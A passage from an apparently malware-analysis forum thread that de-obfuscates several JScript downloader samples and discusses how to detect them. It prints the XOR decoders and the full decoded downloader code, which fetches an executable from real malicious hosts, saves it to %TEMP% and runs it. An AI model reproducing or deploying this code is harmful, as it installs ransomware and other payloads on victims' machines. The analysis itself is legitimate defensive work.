=> empty string : will content at the end of the while loop, the decoded malware part
tcgcu=0;

=> used as index for the loop, to retrieve each string of 5 chars​
while(tcgcu<haina.length){


=> while index < length of the array of string used to do the decode stuff
okpbu +=String.fromCharCode(parseInt(haina[tcgcu].substr(3,2),16)^54);

=> add to the current string (under building) , the current decoded part from the current string of 5 chars.

=> haina[tcgcu] : get the current string (with the current index)

=> substr(3,2) :from the current coded string : get the 2 last chars

=> this two last chars are converted in a Int, considering it was an hexadecimal representation : parseInt(haina[tcgcu].substr(3,2),16)
=> the number is XORED with 54

=> String.fromCharCode : the resulting number is converted into a string
=> okpbu += => the char is added to the string (that will contains at the end all the malware part of the script)

Examples :

"f2650" => "50" => considered as a string representation of 50 in hexadecimal
=> 80 in decimal (= "P")
=> 80 XOR 54 = 102
=> 102 => "f"

"cd343" => "43" => considered as a string representation of 43 in hexadecimal
=> 67 in decimal (= "C")
=> 67 XOR 54 = 117
=> 117 => "u"

"cd358" => "58" => considered as a string representation of 58 in hexadecimal
=> 88 in decimal (= "C")
=> 88 XOR 54 = 117
=> 110 => "n"
We can understand it is for the word "function"
tcgcu++

=> increments the index : tcgcu++ => tcgcu= tcgcu+1​
}
eval(okpbu);

=> here the complete decoded part is in the string, eval(...) => evaluates / runs this part
5) Let's get the decoded string :

We have found the right function using a static analysis method.
To get the decoded string, there are several solutions, using for example a debugger, but after have replaced their random method by our working function.
The dangerous par is eval(okpbu).

The function bgnek can be modified like that :

function bgnek(tmbxb)
{
var haina=tmbxb.match(/\S{5}/g),
okpbu="",
tcgcu=0;
while (tcgcu < haina.length) {
okpbu += String.fromCharCode(parseInt(haina[tcgcu].substr(3, 2), 16) ^ 54);
tcgcu++;
}
return okpbu;
}
=> I replaced the eval(okpbu) by return okpbu !

=> this way, when it returns in the previous calling part, the decoded malware string has not been evaluated / run, but is in the zfgrg var.

It is a way to retrieve the decoded string, without have to make another script on a IDE tool with only the coded string and decoder function
while(true){
try
{
zfgrg=bgnek(znhhx);

=> here, zfgrg contains the decoded string

break;
}
catch(er)
{
var a = 1;
}
This way, the decoded string is (with chars that are for the interpreter):

Code:
"function getDataFromUrl(url, callback){try{var xmlHttp = new ActiveXObject(\"MSXML2.XMLHTTP\");xmlHttp.open(\"GET\", url, false);xmlHttp.send();if (xmlHttp.status == 200) {return callback(xmlHttp.ResponseBody, false);}else{return callback(null, true);}}catch (error){return callback(null, true);}}function getData(callback){try{getDataFromUrl(\"http ://183.81.171.242/c.jpg\", function(result, error) {if (!error){return callback(result, false);}else{getDataFromUrl(\"http://\", function(result, error) {if (!error){return callback(result, false);}else{getDataFromUrl(\"http://\", function(result, error) {if (!error){return callback(result, false);}else{return callback(null, true);}});}});}});}catch (error){return callback(null, true);}}function getTempFilePath(){try{var fs = new ActiveXObject(\"Scripting.FileSystemObject\");var tmpFileName = \"\\\\\" + Math.random().toString(36).substr(2, 9) + \".exe\";var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;return tmpFilePath;}catch (error){return false;}}function saveToTemp(data, callback){try{var path = getTempFilePath();if (path){var objStream = new ActiveXObject(\"ADODB.Stream\");objStream.Open();objStream.Type = 1;objStream.Write(data);objStream.Position = 0;objStream.SaveToFile(path, 2);objStream.Close();return callback(path, false);}else {return callback(null, true);}}catch (error){return callback(null, true);}}getData(function (data, error) {if (!error){saveToTemp(data, function (path, error) {if (!error){try{var wsh = new ActiveXObject(\"WScript.Shell\");wsh.Run(path);}catch (error) {}}});}});"
And after a good formatting and removing the interpreter part : \" => " and the first and last " (because we want the code that can be run, not a string :))

Code:
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl("http ://183.81.171.242/c.jpg", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http://", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});
Exactly the same structure already explained on other of mine analysis.

Summary :

Here is the entry point (where the script begin to "run") :

(1) It calls getData with a function as parameter (that contains another function)

getData(
function(data, error) {

if (!error) {

saveToTemp(

data,

function(path, error) {
if (!error) {

try {

var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);

=> the run part of the payload !
} catch (error) {}
}
}
);
}
}
);

In their method, they used a mix of named function and anonymous function (=without name)

function getData(main_anonymous_function)

=> main_anonymous_function contains a second_main_anonymous_function
Here, we can see they use the same structure that in previous analysis, but only keep one URL.

function getData(callback) {
try {
getDataFromUrl("http ://183.81.171.242/c.jpg", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://", function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}
(2) => calls getDataFromUrl(URL, function_with_next_url_if needed) : is called several time if needed, change the URL tested until the end or if a good working URL is found.

function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
=> http object created using new ActiveXObject("MSXML2.XMLHTTP")
xmlHttp.open("GET", url, false);
=> opens a connection to the URL
xmlHttp.send();
=> sends the request : try to download the payload
if (xmlHttp.status == 200) {
=> if the status is == 200 = > OK
return callback(xmlHttp.ResponseBody, false);
=> returns the content of the request : data received
} else {
=> here : the request failed ( status not != 200)
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
returns to main_anonymous_function :


(3) calls saveToTemp(data_from_http_request, second_main_anonymous_function

function(path, error) {
if (!error) {

try {

var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);
} catch (error) {}
}
}
);
=> var path = getTempFilePath()

=> var fs = new ActiveXObject("Scripting.FileSystemObject");

=> object to manipulate files / folder
=> var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;

=> GetSpecialFolder(2) : 2 => %TEMP% folder

=> %TEMP% + "\' + Math.random().toString(36).substr(2, 9) + ".exe" +

Math.random().toString(36).substr(2, 9)

=> random value converted into a string, and then 9 chars are retrieved from index 2 (third char) !

=> toString(radix)

=> radix : must be an integer between 2 and 36 :
  • 2 - The number will show as a binary value
  • 8 - The number will show as an octal value
  • 16 - The number will show as an hexadecimal value
then 36 : 16 + 2 + 8 => means : binary, octal, hexadecimal are allowed​
=> why not keep the first chars ? Because the random function return a decimal number that begins by : 0.

=> the string also begins with "0."

Example :

=> "0.geja1xsco"
=> don't want this part in the random name :)

=> .substr(2, 9) (= retrieve from index 2, 9 chars)

=> "geja1xsco"
=> %TEMP%\ + 9 random chars + ".exe"

=>Example C:\Users\DardiM\AppData\Local\Temp\geja1xsco.exe​
=> stream object created using new ActiveXObject("ADODB.Stream");

=> stream used to save the data received on a file
returns to second_main_anonymous_function

(4)
=> create a shell object wsh = ActiveXObject("WScript.Shell");
=> use this shell object to run the payload
=> wsh.Run(path)

6) Conclusion :

URL :

http ://183.81.171.242/c.jpg
Payload :
%TEMP%\geja1xsco.exe (example, because it is a complete random name)

Example : C:\Users\DardiM\AppData\Local\Temp\geja1xsco.exe

7/56
Antivirus scan for b074336f2777aeed0346af312522424df51f6dd545c753a821bf4a4affab5dc8 at 2016-12-23 19:01:54 UTC - VirusTotal

az.jpg
 
Last edited:

DardiM

Level 26
Trusted
AV-Tester
Joined
May 14, 2016
Messages
1,567
OS
Windows 10
Antivirus
Kaspersky
#3
https://www.hybrid-analysis.com/sam...7fa776ac1c2f3818401d9d27fc3?environmentId=100
Antivirus scan for 80c2ae9b7e763d3f2fcf761b739890573c62f7fa776ac1c2f3818401d9d27fc3 at 2016-12-24 09:39:10 UTC - VirusTotal
Thanks to @Der.Reisende

BALLANCE-4039.js

Same family.
Only small differences:

1) Their random function :

function uqczp()
{
var ouevr=new Array("}R%","g."+""+"f","h){","e(p","++;","].su","JKX","PTC");
return ouevr[Math.floor(Math['rand'+new Array('om')[0]]()*ouevr.length)];
}

Array :

"}R%",
"g." + "" + "f", => "g.f"
"h){",
"e(p",
"++;",
"].su",

"JKX",
"PTC"​
Previous version :
"xxx"
"}$%"
"g.f"
"h){"
"e(p"
"++;"
"].su"

"}){"
Conclusion :

- same working parts, with one that is built : "g." + "" + "f", => "g.f"
- different useless parts : "}R%", "JKX","PTC"
2) The decoder built :


return (new Function("dqnid","yxikq","rynax","var vbhlj=dqnid.ma"+"tch(/\S{5}/g),tklrf=\"\",eagbr=0;while(eagbr<vbhlj.lengt"+
uqczp()+"tklrf+=Strin"+uqczp()+"romCh"+"arC"+"od"+uqczp()+"ars"+"eI"+"nt(vbhlj[eagbr"+uqczp()+"bstr(3,"+"2),1"+"6)^42);eagbr"+uqczp()+"}eval(tklrf);")(hxhae,null,null));

same as previous sample, but this time they use 42 for the XOR

uqczp() => random parts added
3) Info on the decoded part :

Code:
function getData(callback) {
    try {
        getDataFromUrl("http ://nyrgoodsrd.top/search.php", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http ://nyrgoodsrd.top/search.php", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http ://nyrgoodsrd.top/search.php", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}
URL :

"http ://nyrgoodsrd.top/search.php"​

=> put 3 times​

=> On the previous sample : 1 url, and on the 2 other places : "http://" only

=> The users use a building tool that ask for three URL ...that explain what the url part are not simplified

PAYLOAD :

%TEMP%\random_name (see the first post for the method used to build the random name)

Example : C:\Users\DardiM\AppData\Local\Temp\r56f9hifs.exe



sc.jpg
 
Last edited:

Svoll

Level 12
Joined
Nov 17, 2016
Messages
554
OS
MacOS High Sierra
Antivirus
Norton
#4
As usual I made some modification in several parts, to avoid copy-paste => run => infection :p
You are just picking on me :oops::oops::oops::D Thanks for the explanation!!!

And after a good formatting and removing the interpreter part : \" => " and the first and last " (because we want the code that can be run, not a string :))
 
Last edited:

DardiM

Level 26
Trusted
AV-Tester
Joined
May 14, 2016
Messages
1,567
OS
Windows 10
Antivirus
Kaspersky
#6
From https://malwaretips.com/threads/ransomware-variants-4.66946/
Thanks to @silversurfer

Added this sample because it was a more recent one.

DelDDD13-GASS-Guy.doc.js

Exactly the same principal structure than BALLANCE-4039.js

Main changes :

- Names for functions and var used
- XOR is done with 92
- The encoded string : because of the URL change

string decoded :
Same functions used When can see inside the url use
Code:
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl("http ://www .readheat.com/news/1243142.exe", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http ://www .readheat.com/news/1243142.exe", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http ://www .readheat.com/news/1243142.exe", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});
URL :

http :// www .readheat.com/news/1243142.exe

Payload :

A random name is built, like seen in previous samples.
So, I choose to keep the name in the url:

243142.exe : Trojan-Ransom.Win32.Zerber.avnc

33 / 55

Antivirus scan for aba20c75f28d49e23f7ee25ce890cea2e9b8b12f9fdb8fcd3c47fcece4c6284a at 2016-12-26 19:33:26 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...12f9fdb8fcd3c47fcece4c6284a?environmentId=100
 

DardiM

Level 26
Trusted
AV-Tester
Joined
May 14, 2016
Messages
1,567
OS
Windows 10
Antivirus
Kaspersky
#7
From https://malwaretips.com/threads/2-1-2017-6.67116/
Thanks to @silversurfer

Tomasi-Giovanna.doc.js

Main changes :

- Names for functions and var used
- XOR is done with 20
- The encoded string : because of the URL change
- The array of string to build the decoder function

1) The random function used is : pzkhw()
The parts used to build the decoder function :

"-||&",
"].substr(3,2),16)^",
".fromCharC",
"=Stri",
"arse",

"s{d{",
"d{fsgfg",
"<<J",
"_IE"

=> in red bold, the parts that are for the working function​

2) The anonymous function built :

tfhag=(new Function(
"kguqh",
=> future parameter is not null
"ksiev", => future parameter if not null
"crgsf", => future parameter if not null
"var kzbhb=kguqh.match(/\\S{5}/g),jqpya=\"\",cgrft=0;while(cgrft<kzbhb.length){jqpya+"+pzkhw()+"ng"+pzkhw()+"ode(p"+pzkhw()+"Int(kzbhb[cgrft"+pzkhw()+"20);cgrft++;}eval(jqpya);"

=> future body of the anonymous function
)(asgpd,null,null));

asgpd,null,null :
parameters for the future built decoder :

asgpd => kguq
null => ksiev
null => crgsf

=> then only one parameter : asgpd (the long string to be decoded ) become kguq
4 parts have to be retrieved from the random function , in the right order​

The working function :

9 parts, 4 good parts :

=> 9x9x9x9 = 6561 possibilities to build the decoder (working or not)

Only 1 working possibility :
anonymous function (kguqh)
{

var kzbhb=kguqh.match(/\S{5}/g),
jqpya="",
cgrft=0;
while (cgrft< kzbhb.length) {

jqpya+=String.fromCharCode(parseInt(kzbhb[cgrft].substr(3,2),16)^20);
cgrft++;
}
eval jqpya;
}
jqpya : the downloader part => no changes from previous samples
3) URL & Payload :

 
Last edited:

Svoll

Level 12
Joined
Nov 17, 2016
Messages
554
OS
MacOS High Sierra
Antivirus
Norton
#8

DardiM

Level 26
Trusted
AV-Tester
Joined
May 14, 2016
Messages
1,567
OS
Windows 10
Antivirus
Kaspersky
#9

To run, or not to run--that is the question: I'll wait till you are online if case I need tech support! =P
Thanks for the breakdown and comparison updates!​
To run, or not to run--that is the question ! Lol :D

=> NEVER RUN ! OR ONLY UNDER A VM ENVIRONNEMENT FOR TESTING PURPOSE
=> Complete URL is To black list only :)
I could have hidden the complete URL, but with hybrid-analysis, you can download the sample and the payload, so the problem is the same.
Just made you can't be infected just by clicking on my link.
 
Last edited:

DardiM

Level 26
Trusted
AV-Tester
Joined
May 14, 2016
Messages
1,567
OS
Windows 10
Antivirus
Kaspersky
#10
From https://malwaretips.com/threads/3-1-17-9.67144/
Thanks to @Solarquest

Josephin_ Park_rwdxo_californiaparkingservices.js

- Same main parts than Tomasi-Giovanna.doc.js
- XOR 72
is used
- Var names has been changed.

URL :

http ://86.106.131.141/10.mov​

Payload :


Random name built the way I have already shown.​

 
Last edited:

Svoll

Level 12
Joined
Nov 17, 2016
Messages
554
OS
MacOS High Sierra
Antivirus
Norton
#11
To run, or not to run--that is the question ! Lol :D

=> NEVER RUN ! OR ONLY UNDER A VM ENVIRONNEMENT FOR TESTING PURPOSE
=> Complete URL is To black list only :)
I could have hidden the complete URL, but with hybrid-analysis, you can download the sample and the payload, so the problem is the same.
Just made you can't be infected just by clicking on my link.
Words of wisdom heeded! You know I can't resist taking a malware analysis and not finding out what the payload does. Gonna rebuild an old laptop to test malware, using SD, my photoshop pics of a cute penguin is exposed to danger.
 

DardiM

Level 26
Trusted
AV-Tester
Joined
May 14, 2016
Messages
1,567
OS
Windows 10
Antivirus
Kaspersky
#12
Words of wisdom heeded! You know I can't resist taking a malware analysis and not finding out what the payload does. Gonna rebuild an old laptop to test malware, using SD, my photoshop pics of a cute penguin is exposed to danger.
lol !
Warning for the last payload : look at the details
=> Cheesemaking, Horse.exe !? (really in the details of the file :D)
 
Last edited:

AtlBo

Level 25
Joined
Dec 29, 2014
Messages
1,436
Antivirus
Qihoo 360
#13
=> I replaced the eval(okpbu) by return okpbu !

=> this way, when it returns in the previous calling part, the decoded malware string has not been evaluated / run, but is in the zfgrg var.

It is a way to retrieve the decoded string, without have to make another script on a IDE tool with only the coded string and decoder function
This part is great. Is there a way to use this somehow to eval (sorry o_O and only happy returns :D please) if a process is showing clear signs of returning an obfuscated web address or IP? Or perhaps if process is attempting to contact the internet and has previously been detected as having derived a net contact point this way? If it's not common to obfuscate this way for normal programs, seems like it could be a very tell tale sign of malware...for example detect deobfuscation of web site or IP->block/delete with no user options sort of detection.

Hope the question makes sense. If so, maybe some do this already?

Thanks again. Really great as always.
 

DardiM

Level 26
Trusted
AV-Tester
Joined
May 14, 2016
Messages
1,567
OS
Windows 10
Antivirus
Kaspersky
#14
This part is great. Is there a way to use this somehow to eval (sorry o_O and only happy returns :D please) if a process is showing clear signs of returning an obfuscated web address or IP? Or perhaps if process is attempting to contact the internet and has previously been detected as having derived a net contact point this way? If it's not common to obfuscate this way for normal programs, seems like it could be a very tell tale sign of malware...for example detect deobfuscation of web site or IP->block/delete with no user options sort of detection.

Hope the question makes sense. If so, maybe some do this already?

Thanks again. Really great as always.
Thanks :)

About your question :
You mean : for this family of script-based downloader ?

Personally,the eval function on a script-based file (I am not talking about script on a browser) = "a bad part that will be evaluated / used".

To detect a deobfuscation of website or IP, the problems are :

- How to detect it from another program ?
- How a program can understand that basic operations / functions / methods are used to deobfuscate, and detect that a webiste or IP will be used (URLS are often built in real time as argument of the request function).​

A security tool will only detect / look at in-out operations that could be a clue.

A script-based sample runs under Windows Script Host, and if it is allowed to run (wscript.exe and cscript.exe), some operations can be detected, when it needs to go out the script itself : http request, file creation, use of cmd, etc.

But a normal security tool will not look step by step what a script is doing until he understand a deobfuscation has been made.

You can use existing security tools to detect attempts of remote connections, or strange actions once it is outside the memory of the script.

A lot of "normal" programs used obfuscation methods, also to protect their code / content, and not for bad purpose.

The only solutions I see :
- to block by default all script-based files.
- Or make / use a tool that can try, in a static way, to detect strange parts that could be a clue : eval parts.
- use already existing tools to warn for all strange behavior (connection, creation, etc)
=> only run scripts that you trust
 
Last edited:

DardiM

Level 26
Trusted
AV-Tester
Joined
May 14, 2016
Messages
1,567
OS
Windows 10
Antivirus
Kaspersky
#16
Thanks DardiM. Didn't realize that scripts run unmonitored that way or cannot be monitored. I started asking myself if this is what avast does with its scanner that pop ups sometimes.
If you can make screenshots when it occurs, I will investigate :)

I don't know if I have well explained on my previous post.
If a script-based file attempts to connect to a url, creates a file, etc, (using ActiveX / WScript objects) it can be detected by a tool, because it interacts with windows possibilities.
What occurs inside the code itself with the basic operations (basic functions - not talking about ActiveX or WScript objects), for example used for deobfuscation, can be analysed using a debugger and a humain brain.
But monitored by an automatically tool : it needs a special tool made for this purpose, and able to detect what parts / tricks have been used, an follow step by step what are executed, returned, etc, adapts its behavior for each changed (maker work a lot to improve the obfuscation, change, etc) : I don't know any tool that do it by itself :)
 
Last edited:

Svoll

Level 12
Joined
Nov 17, 2016
Messages
554
OS
MacOS High Sierra
Antivirus
Norton
#17
if a process is showing clear signs of returning an obfuscated web address or IP? Or perhaps if process is attempting to contact the internet and has previously been detected as having derived a net contact point this way?
I often use Fiddler or Paessler for the network monitor part if I have correctly guess what you wanted to do.
The Eval part I find that reading Penguins Post carefully helps out =P Most run the real code hidden on the string that sends or receives the parameter to download, save, and run the payload. I can only understand what it does thru reading his breakdown and deofuscated info.

But monitored by an automatically tool : it needs a special tool made for this purpose, and able to detect what parts / tricks have been used, an follow step by step what are executed, returned, etc, adapts its behavior for each changed (maker work a lot to improve the obfuscation, change, etc) : I don't know any tool that do it by itself :)
BatPenguin can make one for me? Please, Pretty Please @_@ (づ ̄ ³ ̄)づ
 

Svoll

Level 12
Joined
Nov 17, 2016
Messages
554
OS
MacOS High Sierra
Antivirus
Norton
#19
LoL ! Bat-Penguin is not enough skilled to program a tool like that :D
you have the skills, I am just gonna clone you and guess what I got, Special Penguin made for this purpose, and able to detect what parts / tricks have been used, an follow step by step what are executed, returned, etc, adapts its behavior for each changed (maker work a lot to improve the obfuscation, change, etc). ;);););)

Don't forget my movie about 2 penguins running around :p:p:p
 

DardiM

Level 26
Trusted
AV-Tester
Joined
May 14, 2016
Messages
1,567
OS
Windows 10
Antivirus
Kaspersky
#20
you have the skills, I am just gonna clone you and guess what I got, Special Penguin made for this purpose, and able to detect what parts / tricks have been used, an follow step by step what are executed, returned, etc, adapts its behavior for each changed (maker work a lot to improve the obfuscation, change, etc). ;);););)

Don't forget my movie about 2 penguins running around :p:p:p
I can't stop you, only cloning humans is forbidden :D
 
Forgot your password?